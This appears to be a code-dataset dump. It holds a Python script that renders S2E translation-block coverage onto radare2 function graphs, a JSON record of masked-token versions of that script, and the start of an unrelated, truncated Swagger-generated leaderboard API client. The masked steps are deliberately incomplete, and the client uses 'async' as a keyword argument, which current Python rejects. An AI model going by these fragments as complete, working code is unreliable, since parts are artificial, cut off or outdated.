func_name = r2.cmdj('agj 0x%x' % func_addr)[0]['name']
dot_str = r2.cmd('ag 0x%x' % func_addr)
dot = pydot.graph_from_dot_data(dot_str)
if not dot:
continue
else:
dot = dot[0]
for node in dot.get_nodes():
node_name = node.get_name()
try:
# XXX This is very hacky - need something more robust
if node_name.startswith('"'):
node_name = node_name[1:-1]
node_addr = int(node_name, 16)
except ValueError:
# Node name is not a hex string
continue
if node_addr in covered_bbs:
node.set_fillcolor('darkolivegreen2')
svg_path = os.path.join(output_dir, '%s_0x%x.svg' % (func_name, func_addr))
with open(svg_path, 'wb') as f:
svg = dot.create_svg()
f.write(svg)
def generate_graph(s2e_output_dir, s2e_num, project_name):
"""
Generate the PNG graph for the analysis in the output_dir
"""
s2e_env_path = S2E_settings.S2E_ENVIRONMENT_FOLDER_PATH
output_dir = os.path.join(s2e_output_dir, 'functions')
os.makedirs(output_dir)
# Check that the given S2E environment is legitimate
if not os.path.isfile(os.path.join(s2e_env_path, 's2e.yaml')):
print('ERROR: %s is not an S2E environment' % s2e_env_path)
return
# Check that the given project exists in the environment
project_path = os.path.join(s2e_env_path, 'projects', project_name)
if not os.path.isdir(project_path):
print('ERROR: %s is not a valid project' % project_name)
return
# Check that the output directory exists
if not os.path.isdir(output_dir):
print('ERROR: %s is not a valid output directory' % output_dir)
return
# Check that the project has been executed at least once
s2e_last_path = os.path.join(project_path, 's2e-last')
if not os.path.isdir(s2e_last_path):
print('ERROR: %s has no s2e-last' % project_name)
return
# Get all the TB coverage files
tb_coverage_files = glob.glob(os.path.join(s2e_last_path, '*', 'tbcoverage-*.json')) + \
glob.glob(os.path.join(s2e_last_path, 'tbcoverage-*.json'))
if not tb_coverage_files:
print('ERROR: No translation block coverage files found in s2e-last. '
'Did you enable the ``TranslationBlockCoverage`` plugin in '
's2e-config.lua?')
return
# Parse the TB coverage files
covered_tbs = set()
for tb_coverage_file in tb_coverage_files:
# XXX A project can have a different name to the target program
tb_coverage_data = parse_tb_file(tb_coverage_file, project_name)
if not tb_coverage_data:
continue
covered_tbs.update((start, end) for start, end, _ in tb_coverage_data)
# Open the program in Radare and do the initial analysis
# XXX A project can have a different name to the target program
r2 = r2pipe.open(os.path.join(project_path, project_name))
r2.cmd('aaa')
# Calculate the basic block coverage and render the information as a set
# of PNG images for each function
covered_bbs = basic_block_coverage(r2, covered_tbs)
render_functions(r2, covered_bbs, output_dir)
base_path = os.path.join(project_name, 's2e-out-%d' % s2e_num, 'functions')
return [[file_[0:-4], os.path.join(base_path, file_)] for file_ in os.listdir(output_dir)]
|
normal
|
{
"blob_id": "2aee4af2e5a5c3f59dde4d9dd46f8d124a32fb27",
"index": 2590,
"step-1": "<mask token>\n\n\ndef function_addrs(r2):\n \"\"\"\n Yield a list of all the function's start addresses.\n \"\"\"\n for addr in r2.cmdj('aflqj'):\n yield int(addr, 16)\n\n\n<mask token>\n\n\ndef basic_block_coverage(r2, translation_blocks):\n \"\"\"\n Calculate the basic block coverage based on the covered TBs.\n\n Returns a set of *covered* basic block start addresses\n \"\"\"\n covered_bbs = set()\n for func_addr in function_addrs(r2):\n graph = r2.cmdj('agj 0x%x' % func_addr)\n assert len(graph) == 1\n graph = graph[0]\n for tb_start_addr, tb_end_addr in translation_blocks:\n for bb in graph['blocks']:\n bb_start_addr = bb['offset']\n bb_end_addr = bb_start_addr + bb['size']\n if (bb_end_addr >= tb_start_addr >= bb_start_addr or \n bb_start_addr <= tb_end_addr <= bb_end_addr):\n covered_bbs.add(bb_start_addr)\n return covered_bbs\n\n\ndef render_functions(r2, covered_bbs, output_dir):\n \"\"\"\n Renders SVG graphs of each of the functions in the program. Basic blocks\n that were executed by S2E are coloured green.\n\n The resulting SVG images are written to `output_dir`.\n \"\"\"\n for func_addr in function_addrs(r2):\n func_name = r2.cmdj('agj 0x%x' % func_addr)[0]['name']\n dot_str = r2.cmd('ag 0x%x' % func_addr)\n dot = pydot.graph_from_dot_data(dot_str)\n if not dot:\n continue\n else:\n dot = dot[0]\n for node in dot.get_nodes():\n node_name = node.get_name()\n try:\n if node_name.startswith('\"'):\n node_name = node_name[1:-1]\n node_addr = int(node_name, 16)\n except ValueError:\n continue\n if node_addr in covered_bbs:\n node.set_fillcolor('darkolivegreen2')\n svg_path = os.path.join(output_dir, '%s_0x%x.svg' % (func_name,\n func_addr))\n with open(svg_path, 'wb') as f:\n svg = dot.create_svg()\n f.write(svg)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef function_addrs(r2):\n \"\"\"\n Yield a list of all the function's start addresses.\n \"\"\"\n for addr in r2.cmdj('aflqj'):\n yield int(addr, 16)\n\n\n<mask token>\n\n\ndef basic_block_coverage(r2, translation_blocks):\n \"\"\"\n Calculate the basic block coverage based on the covered TBs.\n\n Returns a set of *covered* basic block start addresses\n \"\"\"\n covered_bbs = set()\n for func_addr in function_addrs(r2):\n graph = r2.cmdj('agj 0x%x' % func_addr)\n assert len(graph) == 1\n graph = graph[0]\n for tb_start_addr, tb_end_addr in translation_blocks:\n for bb in graph['blocks']:\n bb_start_addr = bb['offset']\n bb_end_addr = bb_start_addr + bb['size']\n if (bb_end_addr >= tb_start_addr >= bb_start_addr or \n bb_start_addr <= tb_end_addr <= bb_end_addr):\n covered_bbs.add(bb_start_addr)\n return covered_bbs\n\n\ndef render_functions(r2, covered_bbs, output_dir):\n \"\"\"\n Renders SVG graphs of each of the functions in the program. Basic blocks\n that were executed by S2E are coloured green.\n\n The resulting SVG images are written to `output_dir`.\n \"\"\"\n for func_addr in function_addrs(r2):\n func_name = r2.cmdj('agj 0x%x' % func_addr)[0]['name']\n dot_str = r2.cmd('ag 0x%x' % func_addr)\n dot = pydot.graph_from_dot_data(dot_str)\n if not dot:\n continue\n else:\n dot = dot[0]\n for node in dot.get_nodes():\n node_name = node.get_name()\n try:\n if node_name.startswith('\"'):\n node_name = node_name[1:-1]\n node_addr = int(node_name, 16)\n except ValueError:\n continue\n if node_addr in covered_bbs:\n node.set_fillcolor('darkolivegreen2')\n svg_path = os.path.join(output_dir, '%s_0x%x.svg' % (func_name,\n func_addr))\n with open(svg_path, 'wb') as f:\n svg = dot.create_svg()\n f.write(svg)\n\n\ndef generate_graph(s2e_output_dir, s2e_num, project_name):\n \"\"\"\n Generate the PNG graph for the analysis in the output_dir\n \"\"\"\n s2e_env_path = S2E_settings.S2E_ENVIRONMENT_FOLDER_PATH\n output_dir = os.path.join(s2e_output_dir, 'functions')\n os.makedirs(output_dir)\n if not os.path.isfile(os.path.join(s2e_env_path, 's2e.yaml')):\n print('ERROR: %s is not an S2E environment' % s2e_env_path)\n return\n project_path = os.path.join(s2e_env_path, 'projects', project_name)\n if not os.path.isdir(project_path):\n print('ERROR: %s is not a valid project' % project_name)\n return\n if not os.path.isdir(output_dir):\n print('ERROR: %s is not a valid output directory' % output_dir)\n return\n s2e_last_path = os.path.join(project_path, 's2e-last')\n if not os.path.isdir(s2e_last_path):\n print('ERROR: %s has no s2e-last' % project_name)\n return\n tb_coverage_files = glob.glob(os.path.join(s2e_last_path, '*',\n 'tbcoverage-*.json')) + glob.glob(os.path.join(s2e_last_path,\n 'tbcoverage-*.json'))\n if not tb_coverage_files:\n print(\n 'ERROR: No translation block coverage files found in s2e-last. Did you enable the ``TranslationBlockCoverage`` plugin in s2e-config.lua?'\n )\n return\n covered_tbs = set()\n for tb_coverage_file in tb_coverage_files:\n tb_coverage_data = parse_tb_file(tb_coverage_file, project_name)\n if not tb_coverage_data:\n continue\n covered_tbs.update((start, end) for start, end, _ in tb_coverage_data)\n r2 = r2pipe.open(os.path.join(project_path, project_name))\n r2.cmd('aaa')\n covered_bbs = basic_block_coverage(r2, covered_tbs)\n render_functions(r2, covered_bbs, output_dir)\n base_path = os.path.join(project_name, 's2e-out-%d' % s2e_num, 'functions')\n return [[file_[0:-4], os.path.join(base_path, file_)] for file_ in os.\n listdir(output_dir)]\n",
"step-3": "<mask token>\n\n\ndef function_addrs(r2):\n \"\"\"\n Yield a list of all the function's start addresses.\n \"\"\"\n for addr in r2.cmdj('aflqj'):\n yield int(addr, 16)\n\n\ndef parse_tb_file(path, module):\n \"\"\"\n Parse a translation block coverage file generated by S2E's\n ``TranslationBlockCoverage`` plugin.\n \"\"\"\n with open(path, 'r') as f:\n try:\n tb_coverage_data = json.load(f)\n except Exception:\n print('WARN: Failed to parse translation block JSON file %s' % path\n )\n return None\n if not tb_coverage_data:\n print('WARN: Translation block JSON file %s is empty' % path)\n return None\n if module not in tb_coverage_data:\n print('WARN: Target %s not found in translation block JSON file %s' %\n (module, path))\n return None\n return tb_coverage_data[module]\n\n\ndef basic_block_coverage(r2, translation_blocks):\n \"\"\"\n Calculate the basic block coverage based on the covered TBs.\n\n Returns a set of *covered* basic block start addresses\n \"\"\"\n covered_bbs = set()\n for func_addr in function_addrs(r2):\n graph = r2.cmdj('agj 0x%x' % func_addr)\n assert len(graph) == 1\n graph = graph[0]\n for tb_start_addr, tb_end_addr in translation_blocks:\n for bb in graph['blocks']:\n bb_start_addr = bb['offset']\n bb_end_addr = bb_start_addr + bb['size']\n if (bb_end_addr >= tb_start_addr >= bb_start_addr or \n bb_start_addr <= tb_end_addr <= bb_end_addr):\n covered_bbs.add(bb_start_addr)\n return covered_bbs\n\n\ndef render_functions(r2, covered_bbs, output_dir):\n \"\"\"\n Renders SVG graphs of each of the functions in the program. Basic blocks\n that were executed by S2E are coloured green.\n\n The resulting SVG images are written to `output_dir`.\n \"\"\"\n for func_addr in function_addrs(r2):\n func_name = r2.cmdj('agj 0x%x' % func_addr)[0]['name']\n dot_str = r2.cmd('ag 0x%x' % func_addr)\n dot = pydot.graph_from_dot_data(dot_str)\n if not dot:\n continue\n else:\n dot = dot[0]\n for node in dot.get_nodes():\n node_name = node.get_name()\n try:\n if node_name.startswith('\"'):\n node_name = node_name[1:-1]\n node_addr = int(node_name, 16)\n except ValueError:\n continue\n if node_addr in covered_bbs:\n node.set_fillcolor('darkolivegreen2')\n svg_path = os.path.join(output_dir, '%s_0x%x.svg' % (func_name,\n func_addr))\n with open(svg_path, 'wb') as f:\n svg = dot.create_svg()\n f.write(svg)\n\n\ndef generate_graph(s2e_output_dir, s2e_num, project_name):\n \"\"\"\n Generate the PNG graph for the analysis in the output_dir\n \"\"\"\n s2e_env_path = S2E_settings.S2E_ENVIRONMENT_FOLDER_PATH\n output_dir = os.path.join(s2e_output_dir, 'functions')\n os.makedirs(output_dir)\n if not os.path.isfile(os.path.join(s2e_env_path, 's2e.yaml')):\n print('ERROR: %s is not an S2E environment' % s2e_env_path)\n return\n project_path = os.path.join(s2e_env_path, 'projects', project_name)\n if not os.path.isdir(project_path):\n print('ERROR: %s is not a valid project' % project_name)\n return\n if not os.path.isdir(output_dir):\n print('ERROR: %s is not a valid output directory' % output_dir)\n return\n s2e_last_path = os.path.join(project_path, 's2e-last')\n if not os.path.isdir(s2e_last_path):\n print('ERROR: %s has no s2e-last' % project_name)\n return\n tb_coverage_files = glob.glob(os.path.join(s2e_last_path, '*',\n 'tbcoverage-*.json')) + glob.glob(os.path.join(s2e_last_path,\n 'tbcoverage-*.json'))\n if not tb_coverage_files:\n print(\n 'ERROR: No translation block coverage files found in s2e-last. Did you enable the ``TranslationBlockCoverage`` plugin in s2e-config.lua?'\n )\n return\n covered_tbs = set()\n for tb_coverage_file in tb_coverage_files:\n tb_coverage_data = parse_tb_file(tb_coverage_file, project_name)\n if not tb_coverage_data:\n continue\n covered_tbs.update((start, end) for start, end, _ in tb_coverage_data)\n r2 = r2pipe.open(os.path.join(project_path, project_name))\n r2.cmd('aaa')\n covered_bbs = basic_block_coverage(r2, covered_tbs)\n render_functions(r2, covered_bbs, output_dir)\n base_path = os.path.join(project_name, 's2e-out-%d' % s2e_num, 'functions')\n return [[file_[0:-4], os.path.join(base_path, file_)] for file_ in os.\n listdir(output_dir)]\n",
"step-4": "<mask token>\nfrom __future__ import print_function\nimport glob\nimport json\nimport os\nimport pydot\nimport r2pipe\nimport s2e_web.S2E_settings as S2E_settings\n\n\ndef function_addrs(r2):\n \"\"\"\n Yield a list of all the function's start addresses.\n \"\"\"\n for addr in r2.cmdj('aflqj'):\n yield int(addr, 16)\n\n\ndef parse_tb_file(path, module):\n \"\"\"\n Parse a translation block coverage file generated by S2E's\n ``TranslationBlockCoverage`` plugin.\n \"\"\"\n with open(path, 'r') as f:\n try:\n tb_coverage_data = json.load(f)\n except Exception:\n print('WARN: Failed to parse translation block JSON file %s' % path\n )\n return None\n if not tb_coverage_data:\n print('WARN: Translation block JSON file %s is empty' % path)\n return None\n if module not in tb_coverage_data:\n print('WARN: Target %s not found in translation block JSON file %s' %\n (module, path))\n return None\n return tb_coverage_data[module]\n\n\ndef basic_block_coverage(r2, translation_blocks):\n \"\"\"\n Calculate the basic block coverage based on the covered TBs.\n\n Returns a set of *covered* basic block start addresses\n \"\"\"\n covered_bbs = set()\n for func_addr in function_addrs(r2):\n graph = r2.cmdj('agj 0x%x' % func_addr)\n assert len(graph) == 1\n graph = graph[0]\n for tb_start_addr, tb_end_addr in translation_blocks:\n for bb in graph['blocks']:\n bb_start_addr = bb['offset']\n bb_end_addr = bb_start_addr + bb['size']\n if (bb_end_addr >= tb_start_addr >= bb_start_addr or \n bb_start_addr <= tb_end_addr <= bb_end_addr):\n covered_bbs.add(bb_start_addr)\n return covered_bbs\n\n\ndef render_functions(r2, covered_bbs, output_dir):\n \"\"\"\n Renders SVG graphs of each of the functions in the program. Basic blocks\n that were executed by S2E are coloured green.\n\n The resulting SVG images are written to `output_dir`.\n \"\"\"\n for func_addr in function_addrs(r2):\n func_name = r2.cmdj('agj 0x%x' % func_addr)[0]['name']\n dot_str = r2.cmd('ag 0x%x' % func_addr)\n dot = pydot.graph_from_dot_data(dot_str)\n if not dot:\n continue\n else:\n dot = dot[0]\n for node in dot.get_nodes():\n node_name = node.get_name()\n try:\n if node_name.startswith('\"'):\n node_name = node_name[1:-1]\n node_addr = int(node_name, 16)\n except ValueError:\n continue\n if node_addr in covered_bbs:\n node.set_fillcolor('darkolivegreen2')\n svg_path = os.path.join(output_dir, '%s_0x%x.svg' % (func_name,\n func_addr))\n with open(svg_path, 'wb') as f:\n svg = dot.create_svg()\n f.write(svg)\n\n\ndef generate_graph(s2e_output_dir, s2e_num, project_name):\n \"\"\"\n Generate the PNG graph for the analysis in the output_dir\n \"\"\"\n s2e_env_path = S2E_settings.S2E_ENVIRONMENT_FOLDER_PATH\n output_dir = os.path.join(s2e_output_dir, 'functions')\n os.makedirs(output_dir)\n if not os.path.isfile(os.path.join(s2e_env_path, 's2e.yaml')):\n print('ERROR: %s is not an S2E environment' % s2e_env_path)\n return\n project_path = os.path.join(s2e_env_path, 'projects', project_name)\n if not os.path.isdir(project_path):\n print('ERROR: %s is not a valid project' % project_name)\n return\n if not os.path.isdir(output_dir):\n print('ERROR: %s is not a valid output directory' % output_dir)\n return\n s2e_last_path = os.path.join(project_path, 's2e-last')\n if not os.path.isdir(s2e_last_path):\n print('ERROR: %s has no s2e-last' % project_name)\n return\n tb_coverage_files = glob.glob(os.path.join(s2e_last_path, '*',\n 'tbcoverage-*.json')) + glob.glob(os.path.join(s2e_last_path,\n 'tbcoverage-*.json'))\n if not tb_coverage_files:\n print(\n 'ERROR: No translation block coverage files found in s2e-last. Did you enable the ``TranslationBlockCoverage`` plugin in s2e-config.lua?'\n )\n return\n covered_tbs = set()\n for tb_coverage_file in tb_coverage_files:\n tb_coverage_data = parse_tb_file(tb_coverage_file, project_name)\n if not tb_coverage_data:\n continue\n covered_tbs.update((start, end) for start, end, _ in tb_coverage_data)\n r2 = r2pipe.open(os.path.join(project_path, project_name))\n r2.cmd('aaa')\n covered_bbs = basic_block_coverage(r2, covered_tbs)\n render_functions(r2, covered_bbs, output_dir)\n base_path = os.path.join(project_name, 's2e-out-%d' % s2e_num, 'functions')\n return [[file_[0:-4], os.path.join(base_path, file_)] for file_ in os.\n listdir(output_dir)]\n",
"step-5": "\"\"\"\nCopyright (C) Adrian Herrera, 2017\n\nYou will need to install r2pipe and pydot:\n\n```\npip install r2pipe pydot\n```\n\"\"\"\n\nfrom __future__ import print_function\n\nimport glob\nimport json\nimport os\n\nimport pydot\nimport r2pipe\nimport s2e_web.S2E_settings as S2E_settings\n\n\ndef function_addrs(r2):\n \"\"\"\n Yield a list of all the function's start addresses.\n \"\"\"\n for addr in r2.cmdj('aflqj'):\n yield int(addr, 16)\n\n\ndef parse_tb_file(path, module):\n \"\"\"\n Parse a translation block coverage file generated by S2E's\n ``TranslationBlockCoverage`` plugin.\n \"\"\"\n with open(path, 'r') as f:\n try:\n tb_coverage_data = json.load(f)\n except Exception:\n print('WARN: Failed to parse translation block JSON file %s' % path)\n return None\n\n if not tb_coverage_data:\n print('WARN: Translation block JSON file %s is empty' % path)\n return None\n\n if module not in tb_coverage_data:\n print('WARN: Target %s not found in translation block JSON file %s' %\n (module, path))\n return None\n\n return tb_coverage_data[module]\n\n\ndef basic_block_coverage(r2, translation_blocks):\n \"\"\"\n Calculate the basic block coverage based on the covered TBs.\n\n Returns a set of *covered* basic block start addresses\n \"\"\"\n covered_bbs = set()\n\n for func_addr in function_addrs(r2):\n graph = r2.cmdj('agj 0x%x' % func_addr)\n assert len(graph) == 1\n graph = graph[0]\n\n for tb_start_addr, tb_end_addr in translation_blocks:\n for bb in graph['blocks']:\n bb_start_addr = bb['offset']\n bb_end_addr = bb_start_addr + bb['size']\n\n # Check if the translation block falls within a basic block OR\n # a basic block falls within a translation block\n if (bb_end_addr >= tb_start_addr >= bb_start_addr or\n bb_start_addr <= tb_end_addr <= bb_end_addr):\n covered_bbs.add(bb_start_addr)\n\n return covered_bbs\n\n\ndef render_functions(r2, covered_bbs, output_dir):\n \"\"\"\n Renders SVG graphs of each of the functions in the program. Basic blocks\n that were executed by S2E are coloured green.\n\n The resulting SVG images are written to `output_dir`.\n \"\"\"\n for func_addr in function_addrs(r2):\n # Get the function name\n func_name = r2.cmdj('agj 0x%x' % func_addr)[0]['name']\n\n dot_str = r2.cmd('ag 0x%x' % func_addr)\n dot = pydot.graph_from_dot_data(dot_str)\n if not dot:\n continue\n else:\n dot = dot[0]\n\n for node in dot.get_nodes():\n node_name = node.get_name()\n try:\n # XXX This is very hacky - need something more robust\n if node_name.startswith('\"'):\n node_name = node_name[1:-1]\n node_addr = int(node_name, 16)\n except ValueError:\n # Node name is not a hex string\n continue\n\n if node_addr in covered_bbs:\n node.set_fillcolor('darkolivegreen2')\n\n svg_path = os.path.join(output_dir, '%s_0x%x.svg' % (func_name, func_addr))\n with open(svg_path, 'wb') as f:\n svg = dot.create_svg()\n f.write(svg)\n\n\ndef generate_graph(s2e_output_dir, s2e_num, project_name):\n \"\"\"\n Generate the PNG graph for the analysis in the output_dir\n \"\"\"\n\n s2e_env_path = S2E_settings.S2E_ENVIRONMENT_FOLDER_PATH\n output_dir = os.path.join(s2e_output_dir, 'functions')\n os.makedirs(output_dir)\n\n # Check that the given S2E environment is legitimate\n if not os.path.isfile(os.path.join(s2e_env_path, 's2e.yaml')):\n print('ERROR: %s is not an S2E environment' % s2e_env_path)\n return\n\n # Check that the given project exists in the environment\n project_path = os.path.join(s2e_env_path, 'projects', project_name)\n if not os.path.isdir(project_path):\n print('ERROR: %s is not a valid project' % project_name)\n return\n\n # Check that the output directory exists\n if not os.path.isdir(output_dir):\n print('ERROR: %s is not a valid output directory' % output_dir)\n return\n\n # Check that the project has been executed at least once\n s2e_last_path = os.path.join(project_path, 's2e-last')\n if not os.path.isdir(s2e_last_path):\n print('ERROR: %s has no s2e-last' % project_name)\n return\n\n # Get all the TB coverage files\n tb_coverage_files = glob.glob(os.path.join(s2e_last_path, '*', 'tbcoverage-*.json')) + \\\n glob.glob(os.path.join(s2e_last_path, 'tbcoverage-*.json'))\n if not tb_coverage_files:\n print('ERROR: No translation block coverage files found in s2e-last. '\n 'Did you enable the ``TranslationBlockCoverage`` plugin in '\n 's2e-config.lua?')\n return\n\n # Parse the TB coverage files\n covered_tbs = set()\n for tb_coverage_file in tb_coverage_files:\n # XXX A project can have a different name to the target program\n tb_coverage_data = parse_tb_file(tb_coverage_file, project_name)\n if not tb_coverage_data:\n continue\n\n covered_tbs.update((start, end) for start, end, _ in tb_coverage_data)\n\n # Open the program in Radare and do the initial analysis\n # XXX A project can have a different name to the target program\n r2 = r2pipe.open(os.path.join(project_path, project_name))\n r2.cmd('aaa')\n\n # Calculate the basic block coverage and render the information as a set\n # of PNG images for each function\n covered_bbs = basic_block_coverage(r2, covered_tbs)\n render_functions(r2, covered_bbs, output_dir)\n\n base_path = os.path.join(project_name, 's2e-out-%d' % s2e_num, 'functions')\n return [[file_[0:-4], os.path.join(base_path, file_)] for file_ in os.listdir(output_dir)]\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
# coding: utf-8
"""
Knetik Platform API Documentation latest
This is the spec for the Knetik API. Use this in conjunction with the documentation found at https://knetikcloud.com.
OpenAPI spec version: latest
Contact: support@knetik.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..api_client import ApiClient
class GamificationLeaderboardsApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def get_leaderboard(self, context_type, context_id, **kwargs):
"""
Retrieves leaderboard details and paginated entries
The context type identifies the type of entity (i.e., 'activity') being tracked on the leaderboard. The context ID is the unique ID of the actual entity tracked by the leaderboard. Sorting is based on the fields of LeaderboardEntryResource rather than the returned LeaderboardResource. <br><br><b>Permissions Needed:</b> ANY
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_leaderboard(context_type, context_id, async=True)
>>> result = thread.get()
:param async bool
:param str context_type: The context type for the leaderboard (required)
:param str context_id: The context id for the leaderboard (required)
:param int size: The number of objects returned per page
:param int page: The number of the page returned, starting with 1
:param str order: A comma separated list of sorting requirements in priority order, each entry matching PROPERTY_NAME:[ASC|DESC]
:return: LeaderboardResource
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_leaderboard_with_http_info(context_type, context_id, **kwargs)
else:
(data) = self.get_leaderboard_with_http_info(context_type, context_id, **kwargs)
return data
def get_leaderboard_with_http_info(self, context_type, context_id, **kwargs):
"""
Retrieves leaderboard details and paginated entries
The context type identifies the type of entity (i.e., 'activity') being tracked on the leaderboard. The context ID is the unique ID of the actual entity tracked by the leaderboard. Sorting is based on the fields of LeaderboardEntryResource rather than the returned LeaderboardResource. <br><br><b>Permissions Needed:</b> ANY
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_leaderboard_with_http_info(context_type, context_id, async=True)
>>> result = thread.get()
:param async bool
:param str context_type: The context type for the leaderboard (required)
:param str context_id: The context id for the leaderboard (required)
:param int size: The number of objects returned per page
:param int page: The number of the page returned, starting with 1
:param str order: A comma separated list of sorting requirements in priority order, each entry matching PROPERTY_NAME:[ASC|DESC]
:return: LeaderboardResource
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['context_type', 'context_id', 'size', 'page', 'order']
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_leaderboard" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'context_type' is set
if ('context_type' not in params) or (params['context_type'] is None):
raise ValueError("Missing the required parameter `context_type` when calling `get_leaderboard`")
# verify the required parameter 'context_id' is set
if ('context_id' not in params) or (params['context_id'] is None):
raise ValueError("Missing the required parameter `context_id` when calling `get_leaderboard`")
collection_formats = {}
path_params = {}
if 'context_type' in params:
path_params['context_type'] = params['context_type']
if 'context_id' in params:
path_params['context_id'] = params['context_id']
query_params = []
if 'size' in params:
query_params.append(('size', params['size']))
if 'page' in params:
query_params.append(('page', params['page']))
if 'order' in params:
query_params.append(('order', params['order']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# Authentication setting
auth_settings = ['oauth2_client_credentials_grant', 'oauth2_password_grant']
return self.api_client.call_api('/leaderboards/{context_type}/{context_id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='LeaderboardResource',
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_leaderboard_rank(self, context_type, context_id, id, **kwargs):
"""
Retrieves a specific user entry with rank
The context type identifies the type of entity (i.e., 'activity') being tracked on the leaderboard. The context ID is the unique ID of the actual entity tracked by the leaderboard. <br><br><b>Permissions Needed:</b> ANY
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_leaderboard_rank(context_type, context_id, id, async=True)
>>> result = thread.get()
:param async bool
:param str context_type: The context type for the leaderboard (required)
:param str context_id: The context id for the leaderboard (required)
:param str id: The id of a user (required)
:return: LeaderboardEntryResource
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_leaderboard_rank_with_http_info(context_type, context_id, id, **kwargs)
else:
(data) = self.get_leaderboard_rank_with_http_info(context_type, context_id, id, **kwargs)
return data
def get_leaderboard_rank_with_http_info(self, context_type, context_id, id, **kwargs):
"""
Retrieves a specific user entry with rank
The context type identifies the type of entity (i.e., 'activity') being tracked on the leaderboard. The context ID is the unique ID of the actual entity tracked by the leaderboard. <br><br><b>Permissions Needed:</b> ANY
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_leaderboard_rank_with_http_info(context_type, context_id, id, async=True)
>>> result = thread.get()
:param async bool
:param str context_type: The context type for the leaderboard (required)
:param str context_id: The context id for the leaderboard (required)
:param str id: The id of a user (required)
:return: LeaderboardEntryResource
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['context_type', 'context_id', 'id']
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_leaderboard_rank" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'context_type' is set
if ('context_type' not in params) or (params['context_type'] is None):
raise ValueError("Missing the required parameter `context_type` when calling `get_leaderboard_rank`")
# verify the required parameter 'context_id' is set
if ('context_id' not in params) or (params['context_id'] is None):
raise ValueError("Missing the required parameter `context_id` when calling `get_leaderboard_rank`")
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_leaderboard_rank`")
collection_formats = {}
path_params = {}
if 'context_type' in params:
path_params['context_type'] = params['context_type']
if 'context_id' in params:
path_params['context_id'] = params['context_id']
if 'id' in params:
path_params['id'] = params['id']
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# Authentication setting
auth_settings = ['oauth2_client_credentials_grant', 'oauth2_password_grant']
return self.api_client.call_api('/leaderboards/{context_type}/{context_id}/users/{id}/rank', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='LeaderboardEntryResource',
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_leaderboard_strategies(self, **kwargs):
"""
Get a list of available leaderboard strategy names
<b>Permissions Needed:</b> ANY
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_leaderboard_strategies(async=True)
>>> result = thread.get()
:param async bool
:return: list[str]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_leaderboard_strategies_with_http_info(**kwargs)
else:
(data) = self.get_leaderboard_strategies_with_http_info(**kwargs)
return data
def get_leaderboard_strategies_with_http_info(self, **kwargs):
"""
Get a list of available leaderboard strategy names
<b>Permissions Needed:</b> ANY
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_leaderboard_strategies_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:return: list[str]
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_leaderboard_strategies" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# Authentication setting
auth_settings = ['oauth2_client_credentials_grant', 'oauth2_password_grant']
return self.api_client.call_api('/leaderboards/strategies', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[str]',
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
